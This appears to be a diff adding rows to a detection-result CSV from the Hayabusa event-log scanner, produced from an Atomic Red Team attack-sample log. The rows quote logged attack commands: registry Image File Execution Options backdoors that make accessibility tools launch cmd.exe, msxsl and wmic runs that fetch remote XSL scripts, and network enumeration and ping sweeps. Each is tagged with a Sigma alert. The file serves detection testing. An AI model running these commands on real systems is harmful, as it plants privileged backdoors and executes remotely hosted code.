+2019-07-19 23:50:13.185 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6116 | PGUID: 747F3D96-D8A5-5D31-0000-0010C0A03200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:14.678 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-D8A6-5D31-0000-001053A73200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:14.692 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5972 | PGUID: 747F3D96-D8A6-5D31-0000-0010A5A93200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5972 | PGUID: 747F3D96-D8A6-5D31-0000-0010A5A93200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:14.716 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:14.827 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6664 | PGUID: 747F3D96-D8A6-5D31-0000-0010F9B13200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:17.941 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6068 | PGUID: 747F3D96-D8A9-5D31-0000-001072C43200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:17.963 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5124 | PGUID: 747F3D96-D8A9-5D31-0000-0010C0C63200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5124 | PGUID: 747F3D96-D8A9-5D31-0000-0010C0C63200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:17.990 +09:00,MSEDGEWIN10,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:18.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6016 | PGUID: 747F3D96-D8AA-5D31-0000-0010C0C93200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:19.467 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6244 | PGUID: 747F3D96-D8AB-5D31-0000-001054D03200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:19.491 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"" | LID: 0x50951 | PID: 5632 | PGUID: 747F3D96-D8AB-5D31-0000-0010A5D23200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - IFEO Debugger ValueSet | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 5632 | PGUID: 747F3D96-D8AB-5D31-0000-0010A5D23200,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:19.516 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:19.549 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1888 | PGUID: 747F3D96-D8AB-5D31-0000-0010A4D53200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49727 (MSEDGEWIN10.home) | Dst: 172.217.17.132:80 (ams15s30-in-f4.1e100.net) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:25.376 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:50.046 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4004 | PGUID: 747F3D96-D8CA-5D31-0000-0010DA413300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:50.086 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6268 | PGUID: 747F3D96-D8CA-5D31-0000-0010CF443300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:53.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D8CC-5D31-0000-001038513300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:53.062 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1852 | PGUID: 747F3D96-D8CD-5D31-0000-001047543300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:55.991 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5380 | PGUID: 747F3D96-D8CF-5D31-0000-00109B603300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic.exe process /FORMAT:list | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:list"" | LID: 0x50951 | PID: 7040 | PGUID: 747F3D96-D8D0-5D31-0000-0010F3623300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:56.047 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:56.182 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D8D0-5D31-0000-001034673300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:06.728 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5340 | PGUID: 747F3D96-D8DA-5D31-0000-0010D3833300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"" | LID: 0x50951 | PID: 3220 | PGUID: 747F3D96-D8DA-5D31-0000-001029863300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,Evas | Exec,SquiblyTwo,,rules/sigma/process_creation/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:06.753 +09:00,MSEDGEWIN10,1,medium,Evas,XSL Script Processing,,rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:06.888 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D8DA-5D31-0000-00100D8A3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:09.823 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4856 | PGUID: 747F3D96-D8DD-5D31-0000-0010EF923300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net view /domain | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view /domain"" | LID: 0x50951 | PID: 3012 | PGUID: 747F3D96-D8DD-5D31-0000-001043953300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Disc,Windows Network Enumeration,,rules/sigma/process_creation/proc_creation_win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:09.845 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:22.314 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1988 | PGUID: 747F3D96-D8EA-5D31-0000-001030B63300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net view | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""net view"" | LID: 0x50951 | PID: 4684 | PGUID: 747F3D96-D8EA-5D31-0000-00108AB83300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Disc,Windows Network Enumeration,,rules/sigma/process_creation/proc_creation_win_net_enum.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:22.333 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:34.797 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3344 | PGUID: 747F3D96-D8F6-5D31-0000-00100FCB3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:35.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4528 | PGUID: 747F3D96-D8F6-5D31-0000-001091D13300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:35.038 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.1 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3876 | PGUID: 747F3D96-D8F7-5D31-0000-0010EDD33300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:35.579 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.2 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2084 | PGUID: 747F3D96-D8F7-5D31-0000-0010E3D83300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:35.988 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.3 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3068 | PGUID: 747F3D96-D8F7-5D31-0000-0010A7E13300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:36.549 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.4 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4376 | PGUID: 747F3D96-D8F8-5D31-0000-00108FE43300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:37.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.5 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3116 | PGUID: 747F3D96-D8F9-5D31-0000-00108BE73300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:37.513 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.6 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D8F9-5D31-0000-001073EA3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:38.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.7 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1020 | PGUID: 747F3D96-D8FA-5D31-0000-00105BED3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:38.517 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.8 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2292 | PGUID: 747F3D96-D8FA-5D31-0000-001043F03300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:39.028 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.9 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D8FB-5D31-0000-00108BF33300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
